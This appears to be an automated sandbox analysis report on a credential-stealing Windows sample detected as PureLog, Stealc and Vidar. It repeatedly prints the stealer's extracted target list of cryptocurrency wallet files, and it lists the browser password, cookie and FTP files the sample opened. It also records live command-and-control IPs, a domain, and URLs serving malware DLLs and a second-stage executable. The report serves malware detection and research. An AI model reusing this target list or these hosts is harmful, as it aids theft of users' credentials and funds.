Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: sabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: sabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: sabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: sabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000000.1662962002.0000000000A22000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: set_UseMachineKeyStore
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: sabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7488, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected PureLog Stealer
Source: Yara match File source: file.exe, type: SAMPLE
Source: Yara match File source: 0.0.file.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1662962002.0000000000A22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000002.00000002.2378894358.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7488, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7488, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C4C0C40 sqlite3_bind_zeroblob, 2_2_6C4C0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C4C0D60 sqlite3_bind_parameter_name, 2_2_6C4C0D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C3E8EA0 sqlite3_clear_bindings, 2_2_6C3E8EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C4C0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 2_2_6C4C0B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C3E6410 bind,WSAGetLastError, 2_2_6C3E6410
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1501904 Sample: file.exe Startdate: 30/08/2024 Architecture: WINDOWS Score: 100 56 aldiablo.cl 2->56 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 64 13 other signatures 2->64 11 file.exe 2 2->11         started        15 oobeldr.exe 2->15         started        signatures3 process4 file5 48 C:\Users\user\AppData\Local\...\file.exe.log, ASCII 11->48 dropped 74 Found many strings related to Crypto-Wallets (likely being stolen) 11->74 76 Contains functionality to inject code into remote processes 11->76 78 Writes to foreign memory regions 11->78 88 2 other signatures 11->88 17 RegAsm.exe 36 11->17         started        22 conhost.exe 11->22         started        80 Antivirus detection for dropped file 15->80 82 Multi AV Scanner detection for dropped file 15->82 84 Detected unpacking (changes PE section rights) 15->84 86 Switches to a custom stack to bypass stack traces 15->86 24 schtasks.exe 1 15->24         started        signatures6 process7 dnsIp8 52 193.176.190.41, 49733, 49742, 80 AGROSVITUA unknown 17->52 54 aldiablo.cl 186.64.114.115, 443, 49734 ZAMLTDACL Chile 17->54 40 C:\Users\user\AppData\...\softokn3[1].dll, PE32 17->40 dropped 42 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 17->42 dropped 44 C:\Users\user\AppData\...\mozglue[1].dll, PE32 17->44 dropped 46 11 other files (7 malicious) 17->46 dropped 66 Found many strings related to Crypto-Wallets (likely being stolen) 17->66 68 Tries to harvest and steal ftp login credentials 17->68 70 Tries to harvest and steal browser information (history, passwords, etc) 17->70 72 4 other signatures 17->72 26 cmd.exe 1 17->26         started        28 conhost.exe 24->28         started        file9 signatures10 process11 process12 30 HJJDGHCBGD.exe 1 26->30         started        34 conhost.exe 26->34         started        file13 50 C:\Users\user\AppData\Roaming\...\oobeldr.exe, MS-DOS 30->50 dropped 90 Antivirus detection for dropped file 30->90 92 Multi AV Scanner detection for dropped file 30->92 94 Detected unpacking (changes PE section rights) 30->94 96 2 other signatures 30->96 36 schtasks.exe 1 30->36         started        signatures14 process15 process16 38 conhost.exe 36->38         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
186.64.114.115
 aldiablo.cl Chile
52368 ZAMLTDACL false
193.176.190.41
 unknown unknown
207451 AGROSVITUA true

Contacted Domains

Name IP Active
aldiablo.cl 186.64.114.115 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://193.176.190.41/9e7fbd3f0393ef32/mozglue.dll true
  • Avira URL Cloud: malware
 unknown
http://193.176.190.41/9e7fbd3f0393ef32/vcruntime140.dll true
  • Avira URL Cloud: phishing
 unknown
https://aldiablo.cl/karu/l2.exe true
  • Avira URL Cloud: malware
 unknown
http://193.176.190.41/9e7fbd3f0393ef32/msvcp140.dll true
  • Avira URL Cloud: phishing
 unknown
http://193.176.190.41/9e7fbd3f0393ef32/freebl3.dll true
  • Avira URL Cloud: malware
 unknown
http://193.176.190.41/9e7fbd3f0393ef32/nss3.dll true
  • Avira URL Cloud: malware
 unknown
http://193.176.190.41/9e7fbd3f0393ef32/sqlite3.dll true
  • Avira URL Cloud: malware
 unknown
http://193.176.190.41/9e7fbd3f0393ef32/softokn3.dll true
  • Avira URL Cloud: malware
 unknown
http://193.176.190.41/ true
  • Avira URL Cloud: malware
 unknown
http://193.176.190.41/2fa883eebd632382.php true
  • Avira URL Cloud: malware
 unknown